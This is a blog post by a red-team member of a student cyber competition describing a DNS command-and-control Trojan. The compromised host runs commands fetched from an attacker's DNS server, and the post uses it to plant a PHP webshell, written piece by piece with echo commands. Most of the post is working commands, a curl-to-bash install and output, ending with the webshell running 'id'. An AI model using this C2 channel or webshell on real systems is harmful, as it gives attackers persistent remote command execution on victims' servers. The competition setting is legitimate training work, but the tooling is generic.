The competition was made up of 10 student groups (blue teams) from various colleges in the region that were tasked with protecting a mock network against a group of professional pentesters (the red team) who were trying to break in. This was my third year on the red team. Prior to the competition, I built several quick security tools that would make life easier for the red team and enable us to differentiate between the qualities of the blue teams we were attacking. I am planning to release the code that I built for the competition over the next few months in a series of blog posts.
For my first release, I would like to cover one of the command and control (C2) Trojans that I built. My goal was to have a compromised host execute commands from a red team controlled server. I built several methods to make it more difficult for the student blue teams to identify all of them. Most of the C2 Trojans that I wrote were unidirectional, meaning the compromised host would ask the red team server for commands to run and then execute them without providing output back to the red team server. This is a good technique since it makes it harder for the students to detect the traffic.
C2 Trojans can use many different applications and techniques to be effective. For example, the Trojans I wrote used the following methods: DNS, HTTP GET, HTTP POST and Twitter. In addition to my C2 Trojans, we also used several publicly available and private remote access tools (RATs), including poison ivy and others, to directly interact with compromised hosts. Using C2 Trojans and RATs differs in that RATs directly interact with compromised hosts, while we use C2 Trojans to maintain persistence (add a user, add a key to the user’s authorized keys file, run a back door, upload a file, etc.).
My DNS C2 Trojan contains a basic client and server. The DNS server includes a list of commands for the client/victim to run. By default, the server runs on a non-privileged port (5300) that will bind even if you do not have root permissions. The client performs reverse lookups (PTR) for several specified IPs. The server responds with a hostname, which contains a prefix that is double base64 encoded. The client decodes the hostname prefix and executes it.
The server install requires Ruby and the rubydns gem. To install Ruby, run the following commands on a Linux system:
-- CODE lang-shell --\curl -#L https://get.rvm.io | bash -s stable—autolibs=3—ruby
Next, we need to install the rubydns gem. Do this using the following command:
-- CODE lang-shell --gem install rubydns
We are now ready to build a list of tasks we would like our victims to execute. Do this by simply echoing the commands to a file:
-- CODE lang-php --echo -n '
echo -n 'sys'>>/var/www/t.php
echo -n 'tem'>>/var/www/t.php
echo -n '('>>/var/www/t.php
echo -n '$_GET'>>/var/www/t.php
echo -n '[c]'>>/var/www/t.php
echo -n ');'>>/var/www/t.php
echo -n '?>'>>/var/www/t.php
This will build a PHP back door on the compromised machine by echoing the lines into t.php. We need to break up the commands into multiple lines since we are using base64 encoded data and because DNS restricts the number of characters for the response. Since PHP does not care about the line breaks, this won’t be an issue at all. An alternative method would be to wget the back door or binary instead.
Now we are ready to start the server using the following command:
-- CODE lang-shell --bash ./run_server.sh
This command returns the following output:
-- CODE lang-shell --[+] Server Started on port 5300
[+] The records are:
I, [2013-04-02T13:20:08.055796 #4758] INFO—: Starting RubyDNS server (v0.6.1)...
I, [2013-04-02T13:20:08.055967 #4758] INFO—: Listening on udp:0.0.0.0:5300
Lastly, we are ready to run the DNS client on the compromised system. Do this by running the following command:
-- CODE lang-shell --# ./dns_client.sh
[+] Starting Trojan
running cmd1: echo -n '
running cmd2: echo -n 'sys'>>/var/www/t.php
running cmd3: echo -n 'tem'>>/var/www/t.php
running cmd4: echo -n '('>>/var/www/t.php
running cmd5: echo -n '$_GET'>>/var/www/t.php
running cmd6: echo -n '[c]'>>/var/www/t.php
running cmd7: echo -n ');'>>/var/www/t.php
running cmd8: echo -n '?>'>>/var/www/t.php
[+] Trojan Complete!
We can confirm everything worked by browsing to http://VICTIM_IP/t.php?c=id, which will run the “id” command we passed via the “c” argument via our webshell back door.
-- CODE lang-shell --$ curl http://127.0.0.1/t.php?c=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Simple right? Let me know if you have any questions or comments about the Quick C2 DNS Trojan.
I code things that hack all the things. If you do too, let me know—I’m hiring!